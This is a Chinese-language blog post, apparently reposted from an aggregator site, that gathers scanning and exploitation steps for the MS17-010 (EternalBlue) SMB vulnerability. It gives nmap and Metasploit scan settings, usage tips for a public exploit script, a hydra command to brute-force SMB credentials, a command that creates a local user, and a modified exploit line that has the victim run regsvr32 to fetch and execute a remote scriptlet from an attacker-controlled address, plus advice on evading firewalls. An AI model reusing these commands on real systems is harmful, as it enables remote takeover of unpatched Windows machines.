ms17-010 php版本,那年MS17-010
掃描腳本匯總
PHP腳本:
批量掃描:
MSF的:
或者也可以:
smb_ms17_010.rb缺省只掃445/TCP。如果想掃139/TCP,必須:
set SMBDirect false
set RPORT 139
或者
unset SMBDirect
set RPORT 139
NMAP的:
nmap --script smb-vuln-ms17-010 -p445 x.x.x.x
漏洞利用
worawit/MS17-010
https://github.com/worawit/MS17-010
這個腳本其實在nas放出一個月就公開再Exploit-db了,很多人估計都不知道..
那么,查看zzz_exploit.py腳本會看到?from mysmb import MYSMB?之前有人使用python釣魚:mysmb,其實真正安裝了這個模塊的人其實這個腳本反倒會利用失敗.并且把信息發送給釣魚者
依賴項
pipe
經常執行腳本會發現報錯.如下所示
你可能需要的pipe
那么直接通過?python zzz_exploit.py [pipe_name]?即可
當然有些時候沒有設置username和password,并且共享中啟動了密碼訪問..也會導致這個問題
或者可以通過
auxiliary/scanner/smb/pipe_auditor 模塊找尋你需要的pipe
username and password
USERNAME = ''
PASSWORD = ''
只需要更改系統中存在的共享smb賬戶,無論權限多低
那么我們怎么找到對應的賬戶呢,使用如下兩種,當然使用自己寫python腳本更佳啊
hydra -L user.txt -P pass.txt -t 20 10.10.10.10 smb
注意: 此腳本最關鍵地方
如果測試成功,會發現c盤新建了一個pwned.txt文件,同時會執行命令net user test test /add
如果覺得繁瑣,可以用powershell/regsvr32等等執行腳本內容
在python代碼更改成如下即可
service_exec(conn, r'cmd /c regsvr32 /s /n /u /i:http://192.168.2.164:8080/5Msr8HdNh.sct scrobj.dll')
Eternalblue-Doublepulsar-Metasploit
修改eternalblue_doublepulsar.rb中成自己的目錄,修改完成后,我們將rb文件放到metasploit的目錄exploit/windows/smb/
啟動msf后使用reload_all命令重新加載模塊
ms17_010_eternalblue
至于防火墻可以通過https和dns的payload走就行了
ms17_010_psexec
全版本通殺,至于為什么.因為有依賴條件.必須是禁止密碼保護共享的
本文參考此文整理
總結
以上是生活随笔為你收集整理的ms17-010 php版本,那年MS17-010的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: php manager 怎么用,Wind
- 下一篇: php接收rs485的数据如何处理,为什